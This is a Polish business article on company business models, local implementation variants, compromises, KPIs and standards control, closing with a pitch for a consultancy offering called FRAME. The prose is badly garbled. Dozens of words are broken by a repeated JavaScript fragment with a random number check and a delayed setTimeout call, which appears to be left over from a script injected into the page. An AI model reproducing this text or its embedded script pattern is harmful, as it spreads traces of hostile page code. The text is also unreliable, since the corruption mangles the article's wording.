In Artykuły, Handel, Uniwersalne

Funkcjonowanie firmy opisuje jej Model Biznesowy. W firmie handlowej war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jeszcze wyróżnić szczególną część tego Modelu, tę z którą styka się klient końcowy, czyli Koncept Sprzedażowy.

Jednak zarówno Model, jak i Koncept o idealizacja i żaden Model nie działa w praktyce. To zawsze tylko uproszczenie realnej rzeczywis dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości, stworzone, aby zrozumieć firmę i jej przewagę konkurencyjną, schemat działania i zależności między elementami oraz o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniem. Bardzo też będzie przydatne do zarządzania elementami tego Modelu, ze świadomością ich interakcji.

Uwaga. „czy można zacząć od Modelu”? Czy możliwe jest, że najpierw tworzy się Model, a dopiero później wdraża się go w praktyce? Możliwe, ale prawie niewykonalne. Mało k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to potrafi stworzyć funkcjonalny Model w sali konferencyjnej, jest na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zbyt złożony. Poza tym nie ma tu weryfikującej roli rynku i o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenia, które modyfikują i wzbogacają Model. Dlatego zwykle his dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torycznie powstaje firma, potem bada i definiuje swój Model, potem już świadomie go albo wdraża, albo modyfikuje. Ta świadomość pomaga zarządzać i wydobyć w Modelu wszystkie jego możliwości.

Jak powstaje Model Biznesowy? Zwykle przypadkowo, najczęściej najpierw powstaje firma, która walczy na rynku, dostrzega i wykorzystuje możliwości, modyfikuje się i dopasowuje się do o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenia. W fazie tworzenia i wzrostu robi dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trochę na chybił trafił. Jej Model Biznesowy powstaje więc samoistnie, trochę przypadkowo, trochę w efekcie wielu małych decyzji, najczęściej bez świadomości, że w ogóle powstaje. Ale kiedy firma staje się dojrzała, wtedy jej Model Biznesowy najpierw jest przez nią definiowany (tak naprawdę dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to on już jest, ale zostaje opisany) z uwzględnieniem przewagi konkurencyjnej, a potem lokalnie wdrażany i wykonywany, tyle że już świadomie. Na tym zwykle polega wzrost firmy, na mnożeniu tego Modelu, który już ma.

Uwaga. „Modyfikacje Modelu”. Model nigdy nie jest na stałe. Na początku w ogóle go nie ma, tylko dopiero powstaje. Gdy jednak staje się dojrzały, zmiany są już ryzykowne. To kwestia wielkości, ale przede wszystkim dojrzałości firmy. Jednak o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tocznie się zmienia, więc i Model musi się dopasować. Tu można go zmieniać świadomie, wychodząc już od znajomości Modelu. Trzeba jednak pamiętać, że dopasowanie reszty firmy nie nastąpi od razu, zmiany są zbyt szybkie, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też zbyt poważne. Tu trzeba dopasować „ręcznie”, a do tego znajomość Modelu jest wręcz niezbędna.

Każdorazowe wdrażanie Modelu oznacza w praktyce, że za każdym razem powstaje jego nowa wersja, która różni się w szczegółach, choćby przez błędy jakie popełniło się przy wdrożeniu, czasem też firma świadomie idzie na kompromisy. W efekcie powstaje wiele wersji Modelu.

Uwaga. „skala błędów i kompromisów”. Jeśli błędy i kompromisy nie naruszają podstaw i is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toty Modelu, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to lokalne wdrożenie i wykonanie niewiele mu zaszkodzi, wersje będą różne, ale nieznacznie. Jednak jeśli robi się dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to bez świadomości Modelu, nigdy nie wiadomo, co tak naprawdę jest ważne. Wtedy można popełnić błędy na poziomie Modelu, np. w lokalizacji czy relacji w s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunku do lokalnego rynku czy konkurencji. Wtedy problemem będzie nie tylko różnorodność Modeli, ale i lokalne zagrożenie istnienia. Jeśli zaś błędów będzie więcej, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to może dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wręcz zagrozić istnieniu firmy.

Błędy. To odstępstwa od Modelu, tyle że nieświadome, a na pewno nieświadome konsekwencji. Błędy są nieuniknione, jeśli firma rozwija się bez świadomości Modelu, ale też są efektem braku zrozumienia, jakie mogą być ich konsekwencje.

Kompromisy. To też błędy, tyle że popełniane świadomie i z częściową przynajmniej świadomością skutków. Kompromisy są efektem dopasowania do o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenia, które nigdy nie jest dokładnie takie, jakie wymarzył sobie Model.

Ale błędy i kompromisy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dopiero początek. Odstępstwa od Modelu mają też miejsce później, gdy lokalna wersja już działa. Można nią bowiem różnie zarządzać.

Każda wersja jest inaczej wykonywana

Po wdrożeniu następuje wykonanie. Modelem trzeba operować, zarządzać jego elementami. Z jednej strony wykonanie zależy od wdrożenia, np. jeśli wybrano za mały Format, albo firma otworzyła się tam, gdzie ma za mało konsumentów, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wykonanie już tego nie zmieni, musi się dos dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować do tego, co jest.

Ale nawet bez kompromisów we wdrożeniu i tak lokalne wykonywanie Modelu z czasem powoduje, że będą miały miejsce odstępstwa od założeń Modelu.

Uwaga. „liczy się osobowość”. Odstępstwom od założeń Modelu sprzyja ludzka osobowość. Lokalni menedżerowie nie tylko nie zawsze rozumieją Model i dlatego go nie wdrażają. Oni uważają, że zrobią dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to lepiej, a nie widząc całości, łatwo im coś popsuć.

Na powstanie lokalnej wersji Modelu największy wpływ ma jakość zarządzania, w tym jakość, kompetencja i zarządzanie pracowników, a także lokalna obecność i reakcja konkurencji.

Są jeszcze modyfikacje Modelu

Zwykle wypróbowywane w części firmy. Tu firma już świadomie postanawia sprawdzić coś nowego. I świadomie wdraża odstępstwa od Modelu. To nic złego, wręcz nie ma lepszego sposobu, aby coś przetes dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować. Ale tylko pod warunkiem, że wie, co się testuje, dlaczego się testuje, co chce się uzyskać i być go dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towym na modyfikację, jak i na porażkę.

Świadomość celu. Trzeba wiedzieć dlaczego chce się coś zmienić. I jasno dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to określić, najlepiej napisać.

Oczekiwane rezultaty. Wiedzieć nie tylko trzeba, co chce się zmienić, ale i co chce się uzyskać. Bez tego nie wiadomo, czy się udało.

Uwaga. „KPI”. Czyli kluczowe czynniki sukcesu. Skąd wiadomo, że modyfikacja była korzystna? KPI powinno być mierzalne, a przynajmniej jednoznacznie zdefiniowane. Zmiana bez KPI dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to błądzenie na ślepo.

Go dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towość modyfikacji. Prawie na pewno planując zmianę, nie przewidzi się wszystkiego. I dlatego trzeba obserwować, co wyszło i dopasowywać. Jeśli k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś będzie tkwił w błędzie, w myśl własnej nieomylności, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zmiana na pewno się nie uda.

Go dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towość na porażkę. Test polega na tym, że czasem się nie uda. I trzeba umieć się do tego przyznać, przełknąć porażkę i spróbować ponownie. To równie ważne, jak skonsumowanie sukcesu.

Wdrożenie. Jeśli się uda, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zmianę trzeba wszędzie wdrożyć. A tu na przeszkodzie może stać zróżnicowanie lokalnych wersji Modelu. Co działa w jednej wersji, może nie sprawdzić się w innych.

Dobrze i źle

To, że firmie wielooddziałowej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to i dobrze, i źle. Źle, gdyż firmie trudno utrzymać integrację i za każdym razem musi dopasowywać sposób zarządzania do lokalnych warunków, ale też dobrze, gdyż w ten sposób, nawet nieświadomie, testuje wiele wersji własnego Modelu.

Dla lokalnego zarządzania i lokalnej jakości pracowników kluczowa jest kontrola zgodności ze standardami firmy. Te wszystkie elementy jednak zawsze będą w jakimś s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniu lokalne, więc i tak zawsze powstanie lokalna wersja Modelu Biznesowego.

Jak poradzić sobie z problemami? Zacząć trzeba od uświadomienia sobie własnego Modelu. Dzięki temu uda się zawsze zdefiniować błędy, a także nakreślić dopuszczalne granice kompromisów.

Świadomość błędów. Błędy są naturalną częścią lokalnego wdrożenia. Ale żeby je zdefiniować i określić wpływ na Model, trzeba je przedstawić na tle Modelu. Czyli po wdrożeniu trzeba krytycznie spojrzeć na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, co się wdrożyło i porównać z założeniami.

Granice kompromisów. O dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenie jest zmienne, więc dopasowanie będzie niezbędny. Jednak trzeba z góry określić granice kompromisu, nawet widząc, że nie jest idealnie, trzeba wiedzieć, na ile można sobie pozwolić. Czy placówka która powinna mieć 100 m2, może mieć 150? A czy firma, którą się chce kupić jest w stanie przyswoić sobie Model kupującego? I czy jej dotychczasowi klienci dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zaakceptują?

Wzorce zachowań. Każdy element Modelu jest ważny, ale pracownicy są najważniejsi. Ich zachowania zaś dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kluczowa część Modelu. Trzeba z góry określić, jakie są pożądane wzorce ich zachowań i zamiast dopasować zachowania do pracowników, przyjąć tylko takich, którzy będą realizować założenia Modelu.

Odjąć s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topnie swobody. Jak zapewnić, że pracownicy będą się zachowywali zgodnie ze wzorcem? Można ich szkolić i nimi zarządzać, ale najlepiej nie dać im wyboru. Jeśli punkt obsługi jest widoczny, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się nie ukryją, nawet jeśli chcą. Skuteczny jest też tu system IT, który wymusi zachowanie wg określonego schematu.

Kontrola. Na końcu wszystkiego pozostaje kontrola. Jednak kontrolować można tylko zgodność ze wzorcem, najpierw więc musi powstać wzorzec, np. w postaci SOK – Standard Obsługi Klienta. Ale kontrola powinna dotyczyć wszystkich elementów Modelu, nie tylko pracowników. Jeśli jej nie będzie i nie będzie odniesienia do Modelu, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z czasem elementy się zużyją, popsują, zanikną czy zostaną zignorowane.

Podsumowanie

Firma rozwija się powielając własny Model. Żeby jednak robiła dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to skutecznie, powinna go znać. Wtedy zda sobie sprawę, że za każdym razem tworzy nową wersję Modelu. A nawet jeśli nie, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z czasem taka wersja i tak powstanie. Pomoże kontrola, ale tylko wtedy, gdy jasno wiadomo, co kontrolować, jakie są wzorce Modelu i na ile są ważne. Można też wykorzystać tę zmienność we własnym interesie, testując zmiany w Modelu. Ale wtedy trzeba z góry wiedzieć, co się testuje, dlaczego, czego się oczekuje i być przygo dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towanym na modyfikacje. Trzeba też być przygo dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towanym na porażkę, inaczej firma nie przyzna się do błędu i będzie uporczywie lansować coś, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie działa (w ramach Modelu). Trzeba też zadbać, aby zmiana była możliwa w ramach Modelu czy też świadomie ten Model zmodyfikować.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.